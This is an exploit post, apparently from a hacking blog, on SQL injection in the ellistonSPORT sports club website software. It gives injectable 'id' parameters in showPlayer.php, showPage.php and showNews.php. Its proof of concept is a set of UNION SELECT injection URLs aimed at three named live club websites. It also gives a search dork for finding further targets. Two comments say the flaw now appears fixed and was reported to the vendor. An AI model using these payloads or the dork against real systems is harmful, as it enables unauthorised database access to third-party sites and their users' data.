ellistonSPORT Multiple SQL Injection Vuln

[o] ellistonSPORT Multiple SQL Injection Vulnerability
Software : ellistonSPORT
Vendor : http://ellistonsport.com/
Demo : http://demo.ellistonsport.com/index.php
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/

[o] Description
ellistonSPORT is a leading online service providing
professionally designed, easy to update websites for sports clubs and
teams around the world.


[o] Vulnerable file
showPlayer.php
showPage.php
showNews.php

[o] Exploit
http://localhost/[path]/showPlayer.php?id=[SQL]
http://localhost/[path]/showPage.php?id=[SQL]
http://localhost/[path]/showNews.php?id=[SQL]

[o] Proof of Concept
http://garndiffaithrfc.com/showPlayer.php?id=101+AND+1=2+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,database()--
http://www.rbscrusaders.com/showPage.php?id=10+AND+1=2+UNION+SELECT+1,version(),database(),4--
http://www.romafc.co.uk/showNews.php?id=363+AND+1=2+UNION+SELECT+1,version(),database(),4,5,6,7--

[o] Dork
"Powered by ellistonSPORT"



[o] Notes
this is a private script and all target are in one IP address.


2 Responses so far.

  1. Anonymous says:

    It looks like it has been fixed now.

  2. NoGe says:

    yeah it seems like they already fix that vuln. i have tell the vendor before i post it here but there is no "thank you" from them.. whatever!! lol